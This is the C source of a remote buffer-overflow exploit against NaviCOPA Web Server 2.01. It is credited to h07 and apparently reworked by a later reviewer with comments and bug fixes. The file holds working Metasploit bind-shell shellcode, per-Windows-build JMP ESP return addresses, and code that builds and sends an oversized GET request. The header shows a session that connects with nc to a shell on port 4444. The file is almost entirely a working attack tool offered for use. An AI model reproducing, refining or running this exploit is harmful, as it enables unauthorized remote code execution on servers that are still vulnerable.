# Title : NaviCOPA Web Server 2.01 (GET) Remote Buffer Overflow Exploit
# Published : 2006-09-27
# Author : h07
/*
navi_exp.c
NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
Coded by h07 <h07@interia.pl>
Tested on XP SP2 Polish and 2000 SP4 Polish only; the other three return addresses in the target table below are not listed as tested.
Example:
C:\>navi_exp 192.168.0.1 0
[*] NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
[*] Coded by h07 <h07@interia.pl>
[+] Sending buffer: OK
[*] Check your shell on 192.168.0.1:4444
[*] Press enter to quit
C:\>nc -v 192.168.0.1 4444
[192.168.0.1] 4444 (?) open
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\windows\system32>
*/
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define PORT 80        /* TCP port the NaviCOPA HTTP listener is contacted on */
#define BUFF_SIZE 1024 /* request buffer; the crafted GET built in main() is a few hundred bytes, well under this */
/*
 * One exploit target: a human-readable OS/language label (printed by the
 * usage text) and the absolute address that is written over the saved
 * return address on the server's stack.  The table below documents each
 * address as a JMP ESP for that particular Windows build.
 */
typedef struct target
{
    char os_name[32];   /* label shown in the "[>] n: ..." target listing */
    unsigned long ret;  /* 32-bit return address; 4 bytes on the Win32 toolchain this targets */
} target;
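/*
 * Win32_bind shellcode (metasploit): once it runs on the target it binds a
 * command shell on TCP 4444 -- see the usage example in the header.
 * Encoder: PexFnstenvMov
 * Bad chars: 0x00 0x20 0x0a 0x0d 0x2f 0x3f
 * Thx metasploit.com
 *
 * The string must contain no NUL byte, because main() appends it with
 * strlen()/strcat()-style length discovery; all 342 bytes are significant.
 *
 * NOTE(review): the leading bytes look like the PexFnstenvMov decoder stub
 * (push 0x50 / pop ecx / fnstenv GetPC / xor loop over 80 dwords), which is
 * consistent with the 22 + 4*80 = 342 byte total, with the XOR key being the
 * four bytes at offset 13.  Confirm against msfencode output if this payload
 * is ever regenerated.
 */
char shellcode[] =
"\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x91\xba\x06"
"\x13\x83\xeb\xfc\xe2\xf4\x6d\xd0\xed\x5e\x79\x43\xf9\xec\x6e\xda"
"\x8d\x7f\xb5\x9e\x8d\x56\xad\x31\x7a\x16\xe9\xbb\xe9\x98\xde\xa2"
"\x8d\x4c\xb1\xbb\xed\x5a\x1a\x8e\x8d\x12\x7f\x8b\xc6\x8a\x3d\x3e"
"\xc6\x67\x96\x7b\xcc\x1e\x90\x78\xed\xe7\xaa\xee\x22\x3b\xe4\x5f"
"\x8d\x4c\xb5\xbb\xed\x75\x1a\xb6\x4d\x98\xce\xa6\x07\xf8\x92\x96"
"\x8d\x9a\xfd\x9e\x1a\x72\x52\x8b\xdd\x77\x1a\xf9\x36\x98\xd1\xb6"
"\x8d\x63\x8d\x17\x8d\x53\x99\xe4\x6e\x9d\xdf\xb4\xea\x43\x6e\x6c"
"\x60\x40\xf7\xd2\x35\x21\xf9\xcd\x75\x21\xce\xee\xf9\xc3\xf9\x71"
"\xeb\xef\xaa\xea\xf9\xc5\xce\x33\xe3\x75\x10\x57\x0e\x11\xc4\xd0"
"\x04\xec\x41\xd2\xdf\x1a\x64\x17\x51\xec\x47\xe9\x55\x40\xc2\xe9"
"\x45\x40\xd2\xe9\xf9\xc3\xf7\xd2\x17\x4f\xf7\xe9\x8f\xf2\x04\xd2"
"\xa2\x09\xe1\x7d\x51\xec\x47\xd0\x16\x42\xc4\x45\xd6\x7b\x35\x17"
"\x28\xfa\xc6\x45\xd0\x40\xc4\x45\xd6\x7b\x74\xf3\x80\x5a\xc6\x45"
"\xd0\x43\xc5\xee\x53\xec\x41\x29\x6e\xf4\xe8\x7c\x7f\x44\x6e\x6c"
"\x53\xec\x41\xdc\x6c\x77\xf7\xd2\x65\x7e\x18\x5f\x6c\x43\xc8\x93"
"\xca\x9a\x76\xd0\x42\x9a\x73\x8b\xc6\xe0\x3b\x44\x44\x3e\x6f\xf8"
"\x2a\x80\x1c\xc0\x3e\xb8\x3a\x11\x6e\x61\x6f\x09\x10\xec\xe4\xfe"
"\xf9\xc5\xca\xed\x54\x42\xc0\xeb\x6c\x12\xc0\xeb\x53\x42\x6e\x6a"
"\x6e\xbe\x48\xbf\xc8\x40\x6e\x6c\x6c\xec\x6e\x8d\xf9\xc3\x1a\xed"
"\xfa\x90\x55\xde\xf9\xc5\xc3\x45\xd6\x7b\x61\x30\x02\x4c\xc2\x45"
"\xd0\xec\x41\xba\x06\x13";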
char buffer[BUFF_SIZE]; /* request buffer filled by main(); file scope, so it starts zeroed */
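/*
 * Per-target return addresses.  The selected entry is written over the saved
 * return address by main(); the original author documents each as a JMP ESP
 * in that specific Windows build and language pack, so they must be re-found
 * for any other build.  Only the Polish XP SP2 and 2000 SP4 entries are
 * listed as tested in the header.  The <system> argument indexes this table.
 *
 * Inner braces added: the original relied on brace elision, which most
 * compilers flag (-Wmissing-braces) and which silently misassigns fields if a
 * member is ever added to the struct.
 */
target list[] =
{
    { "XP SP2 Polish",    0x7d168877 }, /* JMP ESP */
    { "XP SP2 English",   0x7ca58265 }, /* JMP ESP */
    { "XP SP2 German",    0x7cb4d5ac }, /* JMP ESP */
    { "2000 SP4 Polish",  0x77596433 }, /* JMP ESP */
    { "2000 SP4 English", 0x78326433 }  /* JMP ESP */
};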
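/*
 * Builds the crafted request into out[cap]:
 *   "GET " + 'A' padding up to the saved-return-address slot (offset 234),
 *   the 4-byte return address (little-endian), a 32-byte NOP sled, the
 *   shellcode, then " HTTP/1.1\r\n\r\n".
 * Returns the payload length, or 0 if it would not fit in cap (including the
 * terminating NUL, which is written but not counted).
 */
static size_t build_request(char *out, size_t cap, unsigned long ret)
{
    const size_t ret_off = 234;                  /* "GET " + 230 x 'A' */
    const size_t nop_len = 32;
    const size_t sc_len  = strlen(shellcode);
    const char   tail[]  = " HTTP/1.1\r\n\r\n";
    const size_t total   = ret_off + 4 + nop_len + sc_len + (sizeof tail - 1);
    size_t pos;

    if (total + 1 > cap)
        return 0;

    memset(out, 0x41, ret_off);
    memcpy(out, "GET ", 4);
    pos = ret_off;
    /* Explicit little-endian byte stores instead of the original
     * *(unsigned long *)&out[234] = ret: no unaligned type-punned write,
     * and the width is 4 regardless of sizeof(unsigned long). */
    out[pos++] = (char)(ret & 0xff);
    out[pos++] = (char)((ret >> 8) & 0xff);
    out[pos++] = (char)((ret >> 16) & 0xff);
    out[pos++] = (char)((ret >> 24) & 0xff);
    memset(out + pos, 0x90, nop_len);
    pos += nop_len;
    memcpy(out + pos, shellcode, sc_len);
    pos += sc_len;
    memcpy(out + pos, tail, sizeof tail); /* copies the NUL as well */
    return total;
}

/*
 * Entry point.  Usage: navi_exp <host> <system>
 *   host   - hostname or IPv4 address of the NaviCOPA 2.01 server (port 80)
 *   system - index into the target table printed by the usage text
 * Returns 1 on a usage error, -1 if the target index, Winsock start-up, name
 * resolution, socket set-up or send fails, and 0 once the whole request has
 * been sent.
 *
 * Sending the request does not prove exploitation: the program only reports
 * that the bytes went out.  The payload is a bind shell, so success is
 * confirmed by connecting to TCP 4444 on the target afterwards; a return
 * address that does not match the target's build is likely to crash the
 * service instead.
 *
 * Fixes over the original: WSAStartup()/socket() results are checked, the
 * socket is closed and Winsock cleaned up on every path, a partial send is
 * reported as failure, and a non-numeric <system> is rejected instead of
 * atoi() silently turning it into target 0.
 */
int main(int argc, char *argv[])
{
    WSADATA wsa;
    SOCKET sock = INVALID_SOCKET;
    struct hostent *he;
    struct sockaddr_in srv;
    char *end;
    long os;
    size_t len;
    int i, rc = -1;
    const int last = (int)(sizeof(list) / sizeof(list[0])) - 1;

    printf("\n[*] NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit\n");
    printf("[*] Coded by h07 <h07@interia.pl>\n");
    if (argc < 3) {
        printf("[*] Usage: %s <host> <system>\n", argv[0]);
        printf("[*] Sample: %s 192.168.0.1 0\n", argv[0]);
        printf("[*] Systems..\n");
        for (i = 0; i <= last; i++)
            printf("[>] %d: %s\n", i, list[i].os_name);
        return 1;
    }

    /* strtol with a full-consumption check: "abc" must not become target 0. */
    os = strtol(argv[2], &end, 10);
    if (end == argv[2] || *end != '\0' || os < 0 || os > last) {
        printf("[-] Error: unknown target %s\n", argv[2]);
        return -1;
    }

    len = build_request(buffer, sizeof buffer, list[os].ret);
    if (len == 0) {
        printf("[-] Error: payload does not fit the request buffer\n");
        return -1;
    }

    if (WSAStartup(MAKEWORD(2, 0), &wsa) != 0) {
        printf("[-] Error: WSAStartup()\n");
        return -1;
    }

    if ((he = gethostbyname(argv[1])) == NULL) {
        printf("[-] Unable to resolve\n");
        goto out;
    }

    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock == INVALID_SOCKET) {
        printf("[-] Error: socket()\n");
        goto out;
    }

    memset(&srv, 0, sizeof srv);
    srv.sin_family = AF_INET;
    srv.sin_port = htons(PORT);
    memcpy(&srv.sin_addr, he->h_addr, sizeof srv.sin_addr);

    if (connect(sock, (struct sockaddr *)&srv, sizeof srv) == SOCKET_ERROR) {
        printf("[-] Error: connect()\n");
        goto out;
    }

    /* A short send is a failure: a truncated request cannot place the return
     * address and shellcode at the offsets the overflow depends on. */
    if (send(sock, buffer, (int)len, 0) == (int)len) {
        printf("[+] Sending buffer: OK\n");
        printf("[*] Check your shell on %s:4444\n", argv[1]);
        rc = 0;
    } else {
        printf("[-] Sending buffer: failed\n");
    }
    printf("[*] Press enter to quit\n");
    getchar();

out:
    if (sock != INVALID_SOCKET)
        closesocket(sock);
    WSACleanup();
    return rc;
}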